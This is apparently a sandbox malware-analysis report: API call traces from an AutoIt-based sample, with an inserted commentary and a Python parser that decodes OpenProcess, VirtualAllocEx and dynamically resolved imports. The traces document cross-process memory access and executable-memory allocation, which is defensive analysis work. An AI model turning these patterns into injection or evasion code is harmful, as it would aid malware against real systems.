                                                                              • Opcode Fuzzy Hash: c617873a72bd8a01de15469c13911b86f59343ab6e24c05bfc408db01b8229ec
                                                                              • Instruction Fuzzy Hash: 03412E76900118BFDB11EFA4CC45FDEBBB8EB45700F004159F945B7291DA716E45CBA0
                                                                              APIs
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A0F910,00000000,?,?,?,?), ref: 00A079DF
                                                                              • GetWindowLongW.USER32 ref: 00A079FC
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A07A0C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long
                                                                              • String ID: SysTreeView32
                                                                              • API String ID: 847901565-1698111956
                                                                              • Opcode ID: 4678739c50e55a57ce460d80b60e273d559ea131104f0dd0990e3f8a359befd4
                                                                              • Instruction ID: e2695eed9bbc9f06051e79fa36df4c2411f4df812e5929a3867765d259e8edb0
                                                                              • Opcode Fuzzy Hash: 4678739c50e55a57ce460d80b60e273d559ea131104f0dd0990e3f8a359befd4
                                                                              • Instruction Fuzzy Hash: 8631AD31A0460AAFDB219F78EC41BEB77A9FB45364F208725F875A32E0D731E9518B50
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A07461
                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A07475
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A07499
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window
                                                                              • String ID: SysMonthCal32
                                                                              • API String ID: 2326795674-1439706946
                                                                              • Opcode ID: 91343ce23a2b0fc4daf423e511c6b14146e21eec95619bc0bd3715727287c91d
                                                                              • Instruction ID: bb03afeb212698a245bd36115280ab38e59fc8866350573828fd2a5dba7d29dd
                                                                              • Opcode Fuzzy Hash: 91343ce23a2b0fc4daf423e511c6b14146e21eec95619bc0bd3715727287c91d
                                                                              • Instruction Fuzzy Hash: E121603250021DABDF11CFA4DC46FEE3B69EB48724F110214FE556B1D0DAB6BC519BA0
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A07C4A
                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A07C58
                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A07C5F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$DestroyWindow
                                                                              • String ID: msctls_updown32
                                                                              • API String ID: 4014797782-2298589950
                                                                              • Opcode ID: 92d7782d7271d8adff651190c199905619b469a057e2e2a5453854f186f61983
                                                                              • Instruction ID: a9998ac7d241b47ef9b47d777370273c425d8126cff13716a941c8932f0b1245
                                                                              • Opcode Fuzzy Hash: 92d7782d7271d8adff651190c199905619b469a057e2e2a5453854f186f61983
                                                                              • Instruction Fuzzy Hash: 442162B5A04109AFEB10DF64DCC1DAB37ECEF9A354B140459F9019B3A1CB72EC528BA0
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A06D3B
                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A06D4B
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A06D70
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$MoveWindow
                                                                              • String ID: Listbox
                                                                              • API String ID: 3315199576-2633736733
                                                                              • Opcode ID: 0fa2f88a8fa47e280a30435ac52c127c7abd2b47c1868e3859f68e6e48b16045
                                                                              • Instruction ID: d9c68a744dfb0825dd12ca3a9e959fcf82456928cbc9498c9b7de737d1e0e25a
                                                                              • Opcode Fuzzy Hash: 0fa2f88a8fa47e280a30435ac52c127c7abd2b47c1868e3859f68e6e48b16045
                                                                              • Instruction Fuzzy Hash: 4B21623261011CBFEF158F54EC45FAB3BBAEF89764F118128F9459B1E0C671AC6297A0
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A07772
                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A07787
                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A07794
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: msctls_trackbar32
                                                                              • API String ID: 3850602802-1010561917
                                                                              • Opcode ID: ae1eb9f24275e4a3161786dc4bf336d57bcaa3682c53e0939f999ff887ab7448
                                                                              • Instruction ID: b30f4e7946caddd5159796f77937e9d412589db54413b0b82c8cca6877be182a
                                                                              • Opcode Fuzzy Hash: ae1eb9f24275e4a3161786dc4bf336d57bcaa3682c53e0939f999ff887ab7448
                                                                              • Instruction Fuzzy Hash: 9E11C472644209BFEB209F65DC05F9B7769EF89B54F114528FA41A60D0D672A811CB20
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00984BD0,?,00984DEF,?,00A452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984C11
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00984C23
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 2574300362-3689287502
                                                                              • Opcode ID: 960648a0c301a2c721ef4fb9bfd39c87108865e8034f6777d7d355ec3b6850d4
                                                                              • Instruction ID: 7d8c54d9b830aedc8c77a4eda8bba585960269b6547e3f92915e926165adb48c
                                                                              • Opcode Fuzzy Hash: 960648a0c301a2c721ef4fb9bfd39c87108865e8034f6777d7d355ec3b6850d4
                                                                              • Instruction Fuzzy Hash: B9D01231511727DFD730AFB5D908646B6D9FF09351B118C3A94C5E6650E6B0D481CB50
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00984B83,?), ref: 00984C44
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00984C56
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 2574300362-1355242751
                                                                              • Opcode ID: 271a71ddc81f5e7f008233fd77e70373514e0092f587459ef138f5f9895845a4
                                                                              • Instruction ID: d320a851f03a58dc3ece7f0df9cb70c101d434b56f82fe98f97371e00248effd
                                                                              • Opcode Fuzzy Hash: 271a71ddc81f5e7f008233fd77e70373514e0092f587459ef138f5f9895845a4
                                                                              • Instruction Fuzzy Hash: 0AD0C730900713DFCB30AF71D80824A72E8BF05340B128D3AA5D2E6AA0E670D880CB50
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00A01039), ref: 00A00DF5
                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A00E07
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                              • API String ID: 2574300362-4033151799
                                                                              • Opcode ID: e960c4153ff312b965f62f54ece32038ab5e1dafec8f222c1ba031f9f68ee000
                                                                              • Instruction ID: 2c8d36350d035910810fd053e6514d837de59de0816abd71aaca14a460592c74
                                                                              • Opcode Fuzzy Hash: e960c4153ff312b965f62f54ece32038ab5e1dafec8f222c1ba031f9f68ee000
                                                                              • Instruction Fuzzy Hash: 70D0177051072ADFD7219FB5D808B8776E5AF14352F118C3EA586E2590E6B4D8D1CA50
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,009F8CF4,?,00A0F910), ref: 009F90EE
                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 009F9100
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                              • API String ID: 2574300362-199464113
                                                                              • Opcode ID: 8561454d6c3f254e3beaa9f50873b998d6192069ce9fede6378e01c3ab3e915e
                                                                              • Instruction ID: 72601bcdad64b40ad636f515ff5fb4d646157a1f70e244bbbe6efc43efbad54e
                                                                              • Opcode Fuzzy Hash: 8561454d6c3f254e3beaa9f50873b998d6192069ce9fede6378e01c3ab3e915e
                                                                              • Instruction Fuzzy Hash: 5BD0173461871BDFDB30DF71D81861676E8BF05351B128C3AA686E69A0EA74C881CB90
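                                                                               Two things in the records above deserve a second look, and the Python below, added here as an editor's example and not code from the report or from the analysed sample, pulls both out of a listing in this shape. First, the subcall at 009E13DE takes a process id from a window handle, opens that process with desired access 0x438, which decodes to PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, and commits PAGE_READWRITE memory in it with VirtualAllocEx(MEM_COMMIT); the record's API ID also carries the tokens Memory, Read and Write, so the surrounding function reads and writes that remote allocation. That is how a GUI automation runtime fetches common-control item data from another process, and it is also the primitive a "writes to foreign memory" signature fires on, so the access mask is worth decoding rather than eyeballing. Second, the four records pairing LoadLibraryA with GetProcAddress resolve Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, RegDeleteKeyExW and GetModuleHandleExW at run time, the usual way a runtime stays loadable on Windows versions that lack an export (the >>>AUTOIT NO CMDEXECUTE<<< marker in the first of those argument lists places them in the AutoIt runtime); none of them appears in the static import table, so only a trace like this one, or a string scan for the dll/export pairs, reveals them. The parser assumes records start at an "APIs" heading and that call lines follow the Func.MODULE(args), ref: addr form shown above; the embedded sample is constructed from the page's own lines with the indentation stripped; the constant values are the documented Windows SDK ones.

```python
"""Editor's example (not code from the report or the sample): parse the 'APIs'
records listed above, list imports resolved at run time via LoadLibrary +
GetProcAddress, and decode the OpenProcess / VirtualAllocEx arguments."""
import re

# Win32 constants from the SDK headers (winnt.h, memoryapi.h).
PROCESS_ACCESS = {0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
                  0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
                  0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
                  0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
                  0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
                  0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
MEM_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE", 0x100: "PAGE_GUARD"}

# One trace line: optional "Part of subcall function X: ", then Func.MODULE(args), ref: addr.
# Lines without an argument list ("GetWindowLongW.USER32 ref: ...") also occur in the report.
CALL_RE = re.compile(r"^•\s+(?:Part of subcall function ([0-9A-Fa-f]+): )?"
                     r"(\w+)\.(\w+)(?:\((.*)\),)? ref: ([0-9A-Fa-f]+)$")

# Constructed sample: trace lines copied from the records above, leading whitespace
# removed, everything but the call lines and the 'APIs' headings dropped.
SAMPLE = """
APIs
• Part of subcall function 009E13DE: GetWindowThreadProcessId.USER32(?,?), ref: 009E1409
• Part of subcall function 009E13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,009D925A,00000034,?,?,00001004,00000000,00000000), ref: 009E1419
• Part of subcall function 009E13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,009D925A,00000034,?,?,00001004,00000000,00000000), ref: 009E142F
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00984BD0,?,00984DEF,?,00A452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984C11
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00984C23
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00984B83,?), ref: 00984C44
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00984C56
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00A01039), ref: 00A00DF5
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A00E07
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,009F8CF4,?,00A0F910), ref: 009F90EE
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 009F9100
"""

def parse_records(text):
    """Split the listing at each 'APIs' heading into records of parsed call lines."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": []}
            records.append(cur)
            continue
        m = CALL_RE.match(line) if cur is not None else None
        if m:
            subcall, func, module, args, ref = m.groups()
            cur["apis"].append({"func": func, "module": module, "subcall": subcall,
                                "args": args.split(",") if args else [], "ref": ref})
    return records

def _hex(arg):
    """Arguments are 8-digit hex, or '?' where the sandbox could not recover the value."""
    try:
        return int(arg, 16)
    except ValueError:
        return None

def decode_flags(value, table):
    """Name every bit of `value` found in `table`; leftover bits are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    unknown = value & ~sum(table)
    return names + ([hex(unknown)] if unknown else [])

def dynamic_imports(records):
    """(dll, export) pairs from records that pair LoadLibrary* with GetProcAddress.
    These never show up in the PE import table, so an IAT-only review misses them."""
    pairs = []
    for rec in records:
        dll = next((c["args"][0] for c in rec["apis"]
                    if c["func"].startswith("LoadLibrary") and c["args"]), None)
        if dll is not None:
            pairs += [(dll, c["args"][1]) for c in rec["apis"]
                      if c["func"] == "GetProcAddress" and len(c["args"]) >= 2]
    return pairs

def process_memory_calls(records):
    """Decode OpenProcess desired-access and VirtualAllocEx type/protection masks."""
    found = []
    for rec in records:
        for c in rec["apis"]:
            a = c["args"]
            if c["func"] == "OpenProcess" and a and _hex(a[0]) is not None:
                found.append((c["func"], c["ref"], decode_flags(_hex(a[0]), PROCESS_ACCESS)))
            elif c["func"] == "VirtualAllocEx" and len(a) >= 5:
                names = []
                for raw, table in ((a[3], MEM_TYPE), (a[4], PAGE_PROTECT)):
                    v = _hex(raw)
                    names += decode_flags(v, table) if v is not None else ["?"]
                found.append((c["func"], c["ref"], names))
    return found
```

parse_records(SAMPLE) yields five records; dynamic_imports returns the four dll/export pairs in listing order, and process_memory_calls returns the decoded OpenProcess and VirtualAllocEx entries together with their ref addresses. Arguments the sandbox could not recover are printed as "?" in the report and are passed through as "?" here rather than guessed; unknown bits in a mask are kept as hex instead of being silently dropped, so an unexpected access right still shows up.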
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: LocalTime__swprintf
                                                                              • String ID: %.3d$WIN_XPe
                                                                              • API String ID: 2070861257-2409531811
                                                                              • Opcode ID: bb9c7dd95e8c4d84551043f94eba7afea9c8ec529bb32c2ab0c61271413616c6
                                                                              • Instruction ID: 357f54004ade7b4dda0a866a22aa62017405a0524baa301ff8a7b376e87a1d84
                                                                              • Opcode Fuzzy Hash: bb9c7dd95e8c4d84551043f94eba7afea9c8ec529bb32c2ab0c61271413616c6
                                                                              • Instruction Fuzzy Hash: DAD01271C4410DFBC711D7909899EF973BCA70A301F140D66B402A2141E239C755EA6A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2287ac65dbcbedc6f501551c26fbabfb791d985c6080544f3f079417ba5f1a74
                                                                              • Instruction ID: 644f550b97e5d0a9fbc5b0cd85a8a5b5dc90696c679b928cb9416d8f7fe39a29
                                                                              • Opcode Fuzzy Hash: 2287ac65dbcbedc6f501551c26fbabfb791d985c6080544f3f079417ba5f1a74
                                                                              • Instruction Fuzzy Hash: 21C13B74A44216EFCB14CF94C884AAEFBB9FF48714B158599E805EB361E730ED81DB90
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(?,?), ref: 009FE0BE
                                                                              • CharLowerBuffW.USER32(?,?), ref: 009FE101
                                                                                • Part of subcall function 009FD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 009FD7C5
                                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 009FE301
                                                                              • _memmove.LIBCMT ref: 009FE314
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                                              • String ID:
                                                                              • API String ID: 3659485706-0
                                                                              • Opcode ID: 7da3d4ae2deaee63693b7fe0be04ba996a783b2c5d8073c9d9fe8f5f24c17c8c
                                                                              • Instruction ID: 7cc60cdcf2a03c5763cf34ea914b40571d295908e011000fcfa086938a8caf1c
                                                                              • Opcode Fuzzy Hash: 7da3d4ae2deaee63693b7fe0be04ba996a783b2c5d8073c9d9fe8f5f24c17c8c
                                                                              • Instruction Fuzzy Hash: EAC159716083059FC714DF28C480A6ABBE4FF89718F14896EF9999B361D731E946CB82
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 009F80C3
                                                                              • CoUninitialize.OLE32 ref: 009F80CE
                                                                                • Part of subcall function 009DD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009DD5D4
                                                                              • VariantInit.OLEAUT32(?), ref: 009F80D9
                                                                              • VariantClear.OLEAUT32(?), ref: 009F83AA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                              • String ID:
                                                                              • API String ID: 780911581-0
                                                                              • Opcode ID: bc3161ffc5bab326d5102d7c7a98863806a18f2e2b687dea4f0f65c042702471
                                                                              • Instruction ID: 4cb9db714653394e2acaf084a79080a23bcd5a983b5dc995e4d23e10868cb801
                                                                              • Opcode Fuzzy Hash: bc3161ffc5bab326d5102d7c7a98863806a18f2e2b687dea4f0f65c042702471
                                                                              • Instruction Fuzzy Hash: 2FA158356047059FCB50EF54C881B6AB7E4BF89764F08484CFA969B3A1CB34ED05CB82
                                                                              APIs
                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00A12C7C,?), ref: 009D76EA
                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00A12C7C,?), ref: 009D7702
                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,00A0FB80,000000FF,?,00000000,00000800,00000000,?,00A12C7C,?), ref: 009D7727
                                                                              • _memcmp.LIBCMT ref: 009D7748
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
